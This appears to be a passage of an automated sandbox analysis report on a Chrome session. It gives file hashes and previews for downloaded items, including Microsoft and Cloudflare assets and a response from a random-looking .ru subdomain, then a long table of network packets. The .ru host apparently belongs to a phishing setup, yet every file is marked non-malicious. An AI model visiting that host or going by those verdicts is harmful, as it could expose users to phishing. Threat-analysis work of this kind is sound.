                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                              Category:downloaded
                                                                              Size (bytes):17174
                                                                              Entropy (8bit):2.9129715116732746
                                                                              Encrypted:false
                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/favicon.ico?v2
                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:ASCII text, with very long lines (47694)
                                                                              Category:dropped
                                                                              Size (bytes):47695
                                                                              Entropy (8bit):5.401531363850578
                                                                              Encrypted:false
                                                                              SSDEEP:768:IXCtQmIutwVHbzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZU8nw81KZLGcD:IGJWHbzZBF6xbGfLsVvy33FU8DW
                                                                              MD5:1685878B80EECB073E51C13F17A5E530
                                                                              SHA1:0FFFA666F98F2D8C1156D46D7F9AB90C5B089AF3
                                                                              SHA-256:C61E2E1347B9ACA3D8F0C9725490470651A1F6C02841FF71F90305EA391CA6D2
                                                                              SHA-512:2B32A82A8E7E0A1F6203A04C3E7DDAE6AC3A4438B2309DC04EA112D862839902DD47D2E4A569BCB6F91E359B1F8197F3A179A206A458881A66E89860F96D526E
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:HTML document, ASCII text, with very long lines (955), with CRLF line terminators
                                                                              Category:downloaded
                                                                              Size (bytes):201253
                                                                              Entropy (8bit):2.661810841903416
                                                                              Encrypted:false
                                                                              SSDEEP:768:W7nJSq9GinOo20uqxjr3+AKyKEAPNPPn8P9R/3htzAVT+JcYY5WRItsWc7rQ3S01:WHGiOoHuOjr3+AKyKAXS
                                                                              MD5:85DE642E1467807F64F7E10807DF3869
                                                                              SHA1:C795B490811C0E5A1A8F3C3F620AAB9F00C34F07
                                                                              SHA-256:5965B2C5472AACA1CD66EA5B0D07A971B961FEE72FC27EB1F6C760042084B21B
                                                                              SHA-512:BF4EC56D6FC54EAAFBD57C4E4D06900D358E39CE15009FB983491B0A83ABB60A0A54F46BE86387AB837B4AE1D1F3FF99156D04207065B0F65F165B54CFAAF47B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration
                                                                              Preview:..<!DOCTYPE html><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext".. xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us".. xmlns="http://www.w3.org/1999/xhtml"><head><link rel="shortcut icon".. href="//www.microsoft.com/favicon.ico?v2" /><link.. type="text/css" rel="stylesheet".. href="https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.css".. /><title>Your request has been blocked. This could be.. due to several reasons.</title><meta name="Title".. content="We are sorry, the page you requested cannot be.. found" /><meta name="CorrelationVector".. content="VbLZYbRlhU2hyedN.1" /><meta name="Description".. content="" /><meta name="MscomContentLocale".. content="en-us" /><meta name="
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:very short file (no magic)
                                                                              Category:downloaded
                                                                              Size (bytes):1
                                                                              Entropy (8bit):0.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:U:U
                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru/384603737182923034134733HBIvtgFvMdHIJNXFWYVMFPBUZFKSEIVKZFXFTFPINW
                                                                              Preview:1
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 19 x 18, 8-bit/color RGB, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):61
                                                                              Entropy (8bit):4.068159130770306
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPlmttnljl//xl/k4E08up:6v/lhPST7Tp
                                                                              MD5:0E0320B915D2C2D7F127390F68A1BC77
                                                                              SHA1:FA3B92AE06494875D3C05375E40FE7856EC9D652
                                                                              SHA-256:D02EA52ABDE6F9A786D36A43FEA9C43827456718FF6D806CFFC529BD894A8B87
                                                                              SHA-512:D6BF3FDA5CCA3CCE60291E627B4DBBCBF60B259279468FF2BE3D2C37ABC8BCDCC51FE27FF2E80BC6D25A82E1C0A50FF06E0E522B50BEF2D1534F9E36F7882A70
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e8c6e9b1b1b437a/1732650888673/1F1YFoCiLDS1z55
                                                                              Preview:.PNG........IHDR.............6nr>....IDAT.....$.....IEND.B`.
                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                              Category:downloaded
                                                                              Size (bytes):61
                                                                              Entropy (8bit):3.990210155325004
                                                                              Encrypted:false
                                                                              SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                              Malicious:false
                                                                              Reputation:low
                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                              Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                              No static file info
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 26, 2024 20:54:18.548351049 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:18.548533916 CET49700443192.168.2.1620.190.147.3
                                                                              Nov 26, 2024 20:54:18.568500996 CET49700443192.168.2.1620.190.147.3
                                                                              Nov 26, 2024 20:54:18.568540096 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:18.568794012 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:18.569333076 CET49700443192.168.2.1620.190.147.3
                                                                              Nov 26, 2024 20:54:18.569333076 CET49700443192.168.2.1620.190.147.3
                                                                              Nov 26, 2024 20:54:18.569371939 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:19.251952887 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:19.251979113 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:19.252019882 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:19.252130032 CET49700443192.168.2.1620.190.147.3
                                                                              Nov 26, 2024 20:54:19.252154112 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:19.252192020 CET49700443192.168.2.1620.190.147.3
                                                                              Nov 26, 2024 20:54:19.256323099 CET49700443192.168.2.1620.190.147.3
                                                                              Nov 26, 2024 20:54:19.256341934 CET49700443192.168.2.1620.190.147.3
                                                                              Nov 26, 2024 20:54:19.256458998 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:19.256489992 CET4434970020.190.147.3192.168.2.16
                                                                              Nov 26, 2024 20:54:19.256567001 CET49700443192.168.2.1620.190.147.3
                                                                              Nov 26, 2024 20:54:22.642666101 CET49673443192.168.2.16204.79.197.203
                                                                              Nov 26, 2024 20:54:22.943157911 CET49673443192.168.2.16204.79.197.203
                                                                              Nov 26, 2024 20:54:23.545212984 CET49673443192.168.2.16204.79.197.203
                                                                              Nov 26, 2024 20:54:24.748213053 CET49673443192.168.2.16204.79.197.203
                                                                              Nov 26, 2024 20:54:25.329147100 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:25.329174042 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:25.329572916 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:25.329613924 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:25.329623938 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:25.329818010 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:25.329924107 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:25.329938889 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:25.329997063 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:25.330013990 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.600187063 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.604547977 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.604572058 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.605680943 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.605730057 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.605784893 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.606311083 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.606326103 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.606849909 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.606934071 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.607094049 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.607094049 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.607115030 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.607816935 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.607894897 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.608877897 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.608980894 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.647172928 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.647186995 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.662182093 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.662200928 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:26.694202900 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:26.710199118 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.059247017 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.059510946 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.059554100 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.059604883 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.059631109 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.059937954 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.059968948 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.059993029 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.060002089 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.060029030 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.061629057 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.061672926 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.061829090 CET44349708104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.061903954 CET49708443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.064209938 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.064295053 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.156141043 CET49673443192.168.2.16204.79.197.203
                                                                              Nov 26, 2024 20:54:27.982995987 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.983287096 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.983350992 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.983453989 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.983481884 CET44349707104.18.69.40192.168.2.16
                                                                              Nov 26, 2024 20:54:27.983491898 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:27.983547926 CET49707443192.168.2.16104.18.69.40
                                                                              Nov 26, 2024 20:54:28.367712021 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:28.367755890 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:28.367882013 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:28.368098974 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:28.368108988 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:28.694044113 CET4969080192.168.2.16192.229.211.108
                                                                              Nov 26, 2024 20:54:29.001046896 CET49712443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:29.001079082 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:29.001163006 CET49712443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:29.003375053 CET49712443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:29.003386021 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:29.118568897 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:29.118618965 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:29.118798971 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:29.118928909 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:29.118943930 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:29.587363958 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:29.587646961 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:29.587665081 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:29.588659048 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:29.588725090 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:29.589818954 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:29.589884996 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:29.590138912 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:29.590147018 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:29.643141985 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.255994081 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.256091118 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.256143093 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.256155014 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.256385088 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.256506920 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.256513119 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.257076025 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.257133961 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.257143021 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.264398098 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.264456987 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.264463902 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.272773981 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.272907972 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.272914886 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.319147110 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.319160938 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.362159014 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.376173019 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.398149967 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:30.398202896 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:30.398432016 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:30.398650885 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:30.398669958 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:30.401272058 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.401365995 CET49712443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:30.404525995 CET49712443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:30.404534101 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.404772043 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.425156116 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.446902990 CET49712443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:30.447777987 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.451812029 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.451872110 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.451883078 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.459676981 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.459743977 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.459929943 CET49711443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.459943056 CET44349711162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.476248026 CET49716443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.476273060 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.476363897 CET49716443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.476809025 CET49716443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.476820946 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.478431940 CET49717443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.478478909 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.478701115 CET49717443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.478924990 CET49717443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:30.478940964 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:30.491331100 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.802437067 CET49678443192.168.2.1620.189.173.10
                                                                              Nov 26, 2024 20:54:30.859793901 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:30.860116959 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:30.860136032 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:30.861222029 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:30.861289978 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:30.862345934 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:30.862411976 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:30.908848047 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.908916950 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.908974886 CET49712443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:30.909074068 CET49712443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:30.909074068 CET49712443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:30.909090042 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.909100056 CET443497122.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.913150072 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:30.913166046 CET44349713172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:54:30.948738098 CET49718443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:30.948769093 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.948882103 CET49718443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:30.949136972 CET49718443192.168.2.162.18.84.141
                                                                              Nov 26, 2024 20:54:30.949151039 CET443497182.18.84.141192.168.2.16
                                                                              Nov 26, 2024 20:54:30.960146904 CET49713443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:54:31.102730989 CET49678443192.168.2.1620.189.173.10
                                                                              Nov 26, 2024 20:54:31.625884056 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:31.625925064 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:31.626008034 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:31.627103090 CET49719443192.168.2.164.245.163.56
                                                                              Nov 26, 2024 20:54:31.627115011 CET443497194.245.163.56192.168.2.16
                                                                              Nov 26, 2024 20:54:31.702184916 CET49678443192.168.2.1620.189.173.10
                                                                              Nov 26, 2024 20:54:31.713249922 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:31.714478970 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:31.714490891 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:31.716136932 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:31.716217995 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:31.717371941 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:31.717466116 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:31.717566013 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:31.740133047 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.740423918 CET49716443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:31.740442991 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.740806103 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.741175890 CET49716443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:31.741241932 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.741501093 CET49716443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:31.741893053 CET49716443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:31.741898060 CET44349716162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.763338089 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:31.766197920 CET49714443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:54:31.766221046 CET4434971435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:54:31.803744078 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.806519032 CET49717443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:31.806535006 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.806849003 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.810301065 CET49717443192.168.2.16162.159.140.160
                                                                              Nov 26, 2024 20:54:31.810368061 CET44349717162.159.140.160192.168.2.16
                                                                              Nov 26, 2024 20:54:31.811851025 CET49717443192.168.2.16162.159.140.160
